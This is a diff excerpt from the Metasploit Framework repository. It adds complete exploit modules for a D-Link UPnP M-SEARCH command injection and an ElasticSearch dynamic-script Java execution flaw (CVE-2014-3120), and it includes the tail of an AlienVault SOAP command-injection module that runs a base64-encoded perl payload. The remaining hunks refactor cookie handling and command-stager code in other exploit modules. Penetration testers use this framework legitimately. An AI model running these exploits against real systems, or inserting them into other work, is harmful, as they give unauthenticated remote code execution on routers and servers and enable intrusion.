+      'Privileged'     => true,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          #'BadChars'   => "[;`$<>|]", # Don't apply bcuz of the perl stub applied
+          'Compat'      => {
+            'RequiredCmd' => 'perl netcat-e openssl python gawk'
+          }
+        },
+      'DefaultOptions' =>
+        {
+          'SSL' => true
+        },
+      'Targets'        =>
+        [
+          [ 'AlienVault <= 4.6.1', { }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'May 5 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(40007)
+      ], self.class)
+  end
+
+  def check
+    version = ""
+    res = send_soap_request("get_dpkg")
+
+    if res &&
+       res.code == 200 &&
+       res.headers['SOAPServer'] &&
+       res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
+       res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
+
+      version = $1
+    end
+
+    if version.empty? || version >= "4.7.0"
+      return Exploit::CheckCode::Safe
+    else
+      return Exploit::CheckCode::Appears
+    end
+  end
+
+  def exploit
+    send_soap_request("update_system_info_debian_package", 1)
+  end
+
+  def build_soap_request(method)
+    xml = Document.new
+    xml.add_element(
+      "soap:Envelope",
+      {
+        'xmlns:xsi'          => "http://www.w3.org/2001/XMLSchema-instance",
+        'xmlns:soapenc'      => "http://schemas.xmlsoap.org/soap/encoding/",
+        'xmlns:xsd'          => "http://www.w3.org/2001/XMLSchema",
+        'soap:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/",
+        'xmlns:soap'         => "http://schemas.xmlsoap.org/soap/envelope/"
+      })
+    body = xml.root.add_element("soap:Body")
+    m = body.add_element(
+      method,
+      {
+        'xmlns' => "AV/CC/Util"
+      })
+    args = []
+    args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
+    args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
+    args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
+    args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
+    (0..3).each { |i| args[i].text = rand_text_alpha(4 + rand(4)) }
+
+    if method == "update_system_info_debian_package"
+      args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
+      perl_payload  = "system(decode_base64"
+      perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
+      args[4].text  = "#{rand_text_alpha(4 + rand(4))}"
+      args[4].text += " && perl -MMIME::Base64 -e '#{perl_payload}'"
+    end
+
+    xml.to_s
+  end
+
+  def send_soap_request(method, timeout = 20)
+    soap = build_soap_request(method)
+
+    res = send_request_cgi({
+      'uri'      => '/av-centerd',
+      'method'   => 'POST',
+      'ctype'    => 'text/xml; charset=UTF-8',
+      'data'     => soap,
+      'headers'  => {
+        'SOAPAction' => "\"AV/CC/Util##{method}\""
+      }
+    }, timeout)
+
+    res
+  end
+
+end
diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb
index 3fe23de2e7..43216917d9 100644
--- a/modules/exploits/linux/ids/snortbopre.rb
+++ b/modules/exploits/linux/ids/snortbopre.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
         be used to completely compromise a Snort sensor, and would typically gain an attacker
         full root or administrative privileges.
       },
-      'Author'         => 'KaiJern Lau <xwings [at] mysec.org>',
+      'Author'         => 'KaiJern Lau <xwings[at]mysec.org>',
       'License'        => BSD_LICENSE,
       'References'     =>
         [
diff --git a/modules/exploits/linux/misc/sercomm_exec.rb b/modules/exploits/linux/misc/sercomm_exec.rb
index 8625e5baff..d8e32cb69e 100644
--- a/modules/exploits/linux/misc/sercomm_exec.rb
+++ b/modules/exploits/linux/misc/sercomm_exec.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::CmdStagerEcho
+  include Msf::Exploit::CmdStager
 
   def initialize(info={})
     super(update_info(info,
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
           OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
           OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),
         ], self.class)
-
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -168,7 +168,8 @@ class Metasploit3 < Msf::Exploit::Remote
     execute_cmdstager(
       :noargs => @no_args,
       :temp => @upload_path,
-      :enc_format => @encoding_format
+      :enc_format => @encoding_format,
+      :flavor => :echo
     )
   end
 
diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb
index 42028df550..6733a74033 100644
--- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb
+++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb
@@ -139,4 +139,4 @@ class Metasploit3 < Msf::Exploit::Remote
       handler(conn.lsock)
     end
   end
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb
new file mode 100644
index 0000000000..e5c291b4e7
--- /dev/null
+++ b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection',
+      'Description' => %q{
+        Different D-Link Routers are vulnerable to OS command injection via UPnP Multicast
+        requests. This module has been tested on DIR-300 and DIR-645 devices. Zachary Cutlip
+        has initially reported the DIR-815 vulnerable. Probably there are other devices also
+        affected.
+      },
+      'Author'      =>
+        [
+          'Zachary Cutlip', # Vulnerability discovery and initial exploit
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module and verification on other routers
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit
+          ['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit
+        ],
+      'DisclosureDate' => 'Feb 01 2013',
+      'Privileged'     => true,
+      'Targets' =>
+        [
+          [ 'MIPS Little Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSLE
+            }
+          ],
+          [ 'MIPS Big Endian', # unknown if there are big endian devices out there
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPS
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        Opt::RHOST(),
+        Opt::RPORT(1900)
+      ], self.class)
+
+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    configure_socket
+
+    pkt =
+      "M-SEARCH * HTTP/1.1\r\n" +
+      "Host:239.255.255.250:1900\r\n" +
+      "ST:upnp:rootdevice\r\n" +
+      "Man:\"ssdp:discover\"\r\n" +
+      "MX:2\r\n\r\n"
+
+    udp_sock.sendto(pkt, rhost, rport, 0)
+
+    res = nil
+    1.upto(5) do
+      res,_,_ = udp_sock.recvfrom(65535, 1.0)
+      break if res and res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi
+      udp_sock.sendto(pkt, rhost, rport, 0)
+    end
+
+    # UPnP response:
+    # [*] 192.168.0.2:1900 SSDP Linux, UPnP/1.0, DIR-645 Ver 1.03 | http://192.168.0.2:49152/InternetGatewayDevice.xml | uuid:D02411C0-B070-6009-39C5-9094E4B34FD1::urn:schemas-upnp-org:device:InternetGatewayDevice:1
+    # we do not check for the Device ID (DIR-645) and for the firmware version because there are different
+    # dlink devices out there and we do not know all the vulnerable versions
+
+    if res && res =~ /SERVER:\ Linux,\ UPnP\/1.0,\ DIR-...\ Ver/mi
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def execute_command(cmd, opts)
+    configure_socket
+
+    pkt =
+      "M-SEARCH * HTTP/1.1\r\n" +
+      "Host:239.255.255.250:1900\r\n" +
+      "ST:uuid:`#{cmd}`\r\n" +
+      "Man:\"ssdp:discover\"\r\n" +
+      "MX:2\r\n\r\n"
+
+    udp_sock.sendto(pkt, rhost, rport, 0)
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the device via UPnP ...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+    end
+
+    print_status("#{peer} - Exploiting...")
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 950
+    )
+  end
+
+  # the packet stuff was taken from the module miniupnpd_soap_bof.rb
+  # We need an unconnected socket because SSDP replies often come
+  # from a different sent port than the one we sent to. This also
+  # breaks the standard UDP mixin.
+  def configure_socket
+    self.udp_sock = Rex::Socket::Udp.create({
+      'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
+    })
+    add_socket(self.udp_sock)
+  end
+
+  # Need to define our own rhost/rport/peer since we aren't
+  # using the normal mixins
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  # Accessor for our UDP socket
+  attr_accessor :udp_sock
+
+end
diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb
index fe24f06002..49fb227868 100644
--- a/modules/exploits/multi/browser/itms_overflow.rb
+++ b/modules/exploits/multi/browser/itms_overflow.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
         Because iTunes is multithreaded, only vfork-based payloads should
         be used.
       },
-      'Author'         => [ 'Will Drewry <redpig [at] dataspill.org>' ],
+      'Author'         => [ 'Will Drewry <redpig[at]dataspill.org>' ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb
index cf49018f3d..4f29034c51 100644
--- a/modules/exploits/multi/browser/mozilla_compareto.rb
+++ b/modules/exploits/multi/browser/mozilla_compareto.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
         module is a direct port of Aviv Raff's HTML PoC.
       },
       'License'        => MSF_LICENSE,
-      'Author'         =>  ['hdm', 'Aviv Raff <avivra [at] gmail.com>'],
+      'Author'         =>  ['hdm', 'Aviv Raff <avivra[at]gmail.com>'],
       'References'     =>
         [
           ['CVE',    '2005-2265'],
diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb
index 2c7a1efb27..9b619da376 100644
--- a/modules/exploits/multi/browser/opera_historysearch.rb
+++ b/modules/exploits/multi/browser/opera_historysearch.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'         =>
         [
           'Roberto Suggi', # Discovered the vulnerability
-          'Aviv Raff <avivra [at] gmail.com>', # showed it to be exploitable for code exec
+          'Aviv Raff <avivra[at]gmail.com>', # showed it to be exploitable for code exec
           'egypt',  # msf module
         ],
       'References'     =>
diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb
new file mode 100644
index 0000000000..c338fe7ffa
--- /dev/null
+++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb
@@ -0,0 +1,214 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
+      'Description'    => %q{
+        This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
+        exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
+        REST API, which does not require authentication, where the search
+        function allows dynamic scripts execution. It can be used for remote attackers
+        to execute arbitrary Java code. This module has been tested successfully on
+        ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
+      },
+      'Author'         =>
+        [
+          'Alex Brasetvik',     # Vulnerability discovery
+          'Bouke van der Bijl', # Vulnerability discovery and PoC
+          'juan vazquez'        # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2014-3120'],
+          ['OSVDB', '106949'],
+          ['EDB', '33370'],
+          ['URL', 'http://bouk.co/blog/elasticsearch-rce/'],
+          ['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch']
+        ],
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'ElasticSearch 1.1.1 / Automatic', { } ]
+        ],
+      'DisclosureDate' => 'Dec 09 2013',
+      'DefaultTarget' => 0))
+
+      register_options(
+        [
+          Opt::RPORT(9200),
+          OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', "/"]),
+          OptString.new("WritableDir", [ true, "A directory where we can write files (only for *nix environments)", "/tmp" ])
+        ], self.class)
+  end
+
+  def check
+    result = Exploit::CheckCode::Safe
+
+    if vulnerable?
+      result = Exploit::CheckCode::Vulnerable
+    end
+
+    result
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to execute arbitrary Java...")
+    unless vulnerable?
+      fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
+    end
+
+    print_status("#{peer} - Discovering remote OS...")
+    res = execute(java_os)
+    result = parse_result(res)
+    if result.nil?
+      fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
+    else
+      # TODO: It'd be nice to report_host() with this info.
+      print_good("#{peer} - Remote OS is '#{result}'")
+    end
+
+    jar_file = ""
+    if result =~ /win/i
+      print_status("#{peer} - Discovering TEMP path")
+      res = execute(java_tmp_dir)
+      result = parse_result(res)
+      if result.nil?
+        fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
+      else
+        print_good("#{peer} - TEMP path identified: '#{result}'")
+      end
+      jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
+    else
+      jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar")
+    end
+
+    register_file_for_cleanup(jar_file)
+    execute(java_payload(jar_file))
+  end
+
+  def vulnerable?
+    addend_one = rand_text_numeric(rand(3) + 1).to_i
+    addend_two = rand_text_numeric(rand(3) + 1).to_i
+    sum = addend_one + addend_two
+
+    java = java_sum([addend_one, addend_two])
+    res = execute(java)
+    result = parse_result(res)
+
+    if result.nil?
+      return false
+    else
+      result.to_i == sum
+    end
+  end
+
+  def parse_result(res)
+    unless res && res.code == 200 && res.body
+      return nil
+    end
+
+    begin
+      json = JSON.parse(res.body.to_s)
+    rescue JSON::ParserError
+      return nil
+    end
+
+    begin
+      result = json['hits']['hits'][0]['fields']['msf_result'][0]
+    rescue
+      return nil
+    end
+
+    result
+  end
+
+  def java_sum(summands)
+    source = <<-EOF
+#{summands.join(" + ")}
+    EOF
+
+    source
+  end
+
+  def to_java_byte_array(str)
+    buff = "byte[] buf = new byte[#{str.length}];\n"
+    i = 0
+    str.unpack('C*').each do |c|
+      buff << "buf[#{i}] = #{c};\n"
+      i = i + 1
+    end
+
+    buff
+  end
+
+  def java_os
+    "System.getProperty(\"os.name\")"
+  end
+
+  def java_tmp_dir
+    "System.getProperty(\"java.io.tmpdir\");"
+  end
+
+
+  def java_payload(file_name)
+    source = <<-EOF
+import java.io.*;
+import java.lang.*;
+import java.net.*;
+
+#{to_java_byte_array(payload.encoded_jar.pack)}
+File f = new File('#{file_name.gsub(/\\/, "/")}');
+FileOutputStream fs = new FileOutputStream(f);
+bs = new BufferedOutputStream(fs);
+bs.write(buf);
+bs.close();
+bs = null;
+URL u = f.toURI().toURL();
+URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u});
+Class c = cl.loadClass('metasploit.Payload');
+c.main(null);
+    EOF
+
+    source
+  end
+
+  def execute(java)
+    payload = {
+      "size" => 1,
+      "query" => {
+        "filtered" => {
+          "query" => {
+            "match_all" => {}
+          }
+        }
+      },
+      "script_fields" => {
+        "msf_result" => {
+          "script" => java
+        }
+      }
+    }
+
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path.to_s, "_search"),
+      'method' => 'POST',
+      'data'   => JSON.generate(payload)
+    })
+
+    return res
+  end
+
+end
diff --git a/modules/exploits/multi/http/activecollab_chat.rb b/modules/exploits/multi/http/activecollab_chat.rb
index d926fafdce..7a6bf553b4 100644
--- a/modules/exploits/multi/http/activecollab_chat.rb
+++ b/modules/exploits/multi/http/activecollab_chat.rb
@@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # response handling
     if res and res.code == 302
-      if (res.headers['Set-Cookie'] =~ /ac_ActiveCollab_sid_eaM4h3LTIZ=(.*); expires=/)
+      if res.get_cookies =~ /ac_ActiveCollab_sid_[a-zA-Z0-9]+=(.*); expires=/
         acsession = $1
       end
     elsif res and res.body =~ /Failed to log you in/
diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb
index acf1734552..dfe58bb7d6 100644
--- a/modules/exploits/multi/http/axis2_deployer.rb
+++ b/modules/exploits/multi/http/axis2_deployer.rb
@@ -283,7 +283,7 @@ class Metasploit3 < Msf::Exploit::Remote
           # likely to change
 
           success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
-          if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
+          if res.get_cookies =~ /JSESSIONID=(.*);/
             session = $1
           end
         end
@@ -319,7 +319,7 @@ class Metasploit3 < Msf::Exploit::Remote
           # likely to change
 
           success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
-          if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
+          if res.get_cookies =~ /JSESSIONID=(.*);/
             session = $1
           end
         end
diff --git a/modules/exploits/multi/http/dexter_casinoloader_exec.rb b/modules/exploits/multi/http/dexter_casinoloader_exec.rb
index 9e4e795987..f7844589e7 100644
--- a/modules/exploits/multi/http/dexter_casinoloader_exec.rb
+++ b/modules/exploits/multi/http/dexter_casinoloader_exec.rb
@@ -79,8 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
         'page' => Rex::Text.encode_base64("' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + row.to_s + " -- --")
       }
     })
-    if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=')
-      return Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1]))[1..-3]
+    if res and !res.get_cookies.empty? and res.get_cookies.start_with?('response=')
+      return Rex::Text.decode_base64(URI.unescape(res.get_cookies['response='.length..-1]))[1..-3]
     end
     return false
   end
@@ -96,8 +96,8 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
-    if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=') and
-      Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1])) == '$' + testvalue + ';#' and database_get_field('users', 'name', 0) != false
+    if res and !res.get_cookies.empty? and res.get_cookies.start_with?('response=') and
+      Rex::Text.decode_base64(URI.unescape(res.get_cookies['response='.length..-1])) == '$' + testvalue + ';#' and database_get_field('users', 'name', 0) != false
       return Exploit::CheckCode::Vulnerable
     end
     return Exploit::CheckCode::Safe
@@ -167,4 +167,4 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
   end
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb
index 36dbc96e70..5dae86e055 100644
--- a/modules/exploits/multi/http/gitorious_graph.rb
+++ b/modules/exploits/multi/http/gitorious_graph.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # Make sure the URI begins with a slash
     uri = normalize_uri(datastore['URI'])
 
-    command = Rex::Text.uri_encode(payload.raw, 'hex-all')
+    command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes')
     command.gsub!("%20","%2520")
     res = send_request_cgi({
       'uri'     => "/api"+ uri + "/log/graph/%60#{command}%60",
diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index 7115369187..042f17ccd2 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -684,7 +684,7 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("Trying #{type} credentials for GlassFish 2.x #{user}:'#{pass}'....")
       res = try_login(user,pass)
       if res and res.code == 302
-        session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
+        session = $1 if res and res.get_cookies =~ /JSESSIONID=(.*); /i
         res = send_request('/applications/upload.jsf', 'GET', session)
 
         p = /<title>Deploy Enterprise Applications\/Modules/
@@ -697,7 +697,7 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("Trying #{type} credentials for GlassFish 3.x #{user}:'#{pass}'....")
       res = try_login(user,pass)
       if res and res.code == 302
-        session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
+        session = $1 if res and res.get_cookies =~ /JSESSIONID=(.*); /i
         res = send_request('/common/applications/uploadFrame.jsf', 'GET', session)
 
         p = /<title>Deploy Applications or Modules/
@@ -788,7 +788,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Glassfish edition: #{banner}")
 
     #Get session
-    res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /
+    res.get_cookies =~ /JSESSIONID=(.*); /
     session = $1
 
     #Set HTTP verbs.  lower-case is used to bypass auth on v3.0
diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb
index 56c54d1008..aec23ca800 100644
--- a/modules/exploits/multi/http/glossword_upload_exec.rb
+++ b/modules/exploits/multi/http/glossword_upload_exec.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
         if res.code == 200
           vprint_error("#{peer} - Authentication failed")
           return Exploit::CheckCode::Unknown
-        elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
+        elsif res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/
           vprint_good("#{peer} - Authenticated successfully")
           return Exploit::CheckCode::Appears
         end
@@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # login; get session id and token
     print_status("#{peer} - Authenticating as user '#{user}'")
     res = login(base, user, pass)
-    if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
+    if res and res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/
       token = "#{$1}"
       sid   = "#{$2}"
       print_good("#{peer} - Authenticated successfully")
diff --git a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb
index 221ed08964..b93b7ac9ba 100644
--- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb
+++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include REXML
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::Remote::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'HP SiteScope 11.20 / Windows',
             {
               'Arch' => ARCH_X86,
-              'Platform' => 'win'
+              'Platform' => 'win',
+              'CmdStagerFlavor' => 'vbs'
             }
           ],
           [ 'HP SiteScope 11.20 / Linux',
diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
index 825701d651..90b9a989e2 100644
--- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
+++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'method' => 'POST'
     )
 
-    if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/
+    if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=([0-9A-F]*);/
       session_id = $1
     else
       print_error("#{peer} - Retrieve of initial JSESSIONID failed")
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
           }
       })
 
-    if res and res.code == 302 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/
+    if res and res.code == 302 and res.get_cookies =~ /JSESSIONID=([0-9A-F]*);/
       session_id = $1
       redirect =  URI(res.headers['Location']).path
     else
diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb
index 581fbce608..bbb6d97e6e 100644
--- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb
+++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info={})
@@ -41,19 +41,23 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['Linux', {
             'Platform' => 'linux',
-            'Arch' => ARCH_X86
+            'Arch' => ARCH_X86,
+            'CmdStagerFlavor' => 'bourne'
           }],
           ['Linux (x64)', {
             'Platform' => 'linux',
-            'Arch' => ARCH_X86_64
+            'Arch' => ARCH_X86_64,
+            'CmdStagerFlavor' => 'bourne'
           }],
           ['Windows', {
             'Platform' => 'win',
-            'Arch' => ARCH_X86
+            'Arch' => ARCH_X86,
+            'CmdStagerFlavor' => 'vbs'
           }],
           ['Windows (x64)', {
             'Platform' => 'win',
-            'Arch' => ARCH_X86_64
+            'Arch' => ARCH_X86_64,
+            'CmdStagerFlavor' => 'vbs'
           }],
         ],
       'Privileged'     => false,
@@ -113,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # CpqElm-Login: success
     if res.headers['CpqElm-Login'].to_s =~ /success/
-      cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
+      cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
     end
 
     cookie
@@ -121,11 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def setup_stager
-    case target.opts['Platform']
-    when "linux" then opts = { :temp => './', :linemax => 2800 }
-    when "win"   then opts = { :temp => '.', :linemax => 2800 }
-    end
-    execute_cmdstager(opts)
+    execute_cmdstager(:temp => './', :linemax => 2800)
   end
 
 
@@ -194,8 +194,6 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     @cookie = ''
 
-    extend Msf::Exploit::CmdStagerBourne if target.opts['Platform'] == "linux"
-
     setup_stager
   end
 end
diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb
index 19c9a442ed..3bd3976973 100644
--- a/modules/exploits/multi/http/hyperic_hq_script_console.rb
+++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           # Tested on Hyperic HQ versions 4.5.2-win32 and 4.6.6-win32 on Windows XP SP3 and Ubuntu 10.04
           ['Automatic', {} ],
-          ['Windows',  {'Arch' => ARCH_X86, 'Platform' => 'win'}],
+          ['Windows',  {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => 'vbs'}],
           ['Linux',    {'Arch' => ARCH_X86, 'Platform' => 'linux' }],
           ['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
       ],
@@ -63,13 +63,16 @@ class Metasploit3 < Msf::Exploit::Remote
     @cookie = "JSESSIONID=#{Rex::Text.rand_text_hex(32)}"
 
     res = send_request_cgi({
-      'uri'       => normalize_uri(@uri.path, "j_spring_security_check?org.apache.catalina.filters.CSRF_NONCE="),
+      'uri'       => normalize_uri(@uri.path, 'j_spring_security_check'),
       'method'    => 'POST',
       'cookie'    => @cookie,
       'vars_post' => {
         'j_username' => Rex::Text.uri_encode(user, 'hex-normal'),
         'j_password' => Rex::Text.uri_encode(pass, 'hex-normal'),
         'submit'     => 'Sign+in'
+      },
+      'vars_get'  => {
+        'org.apache.catalina.filters.CSRF_NONCE' => ''
       }
     })
 
@@ -81,8 +84,11 @@ class Metasploit3 < Msf::Exploit::Remote
   #
   def get_nonce
     res = send_request_cgi({
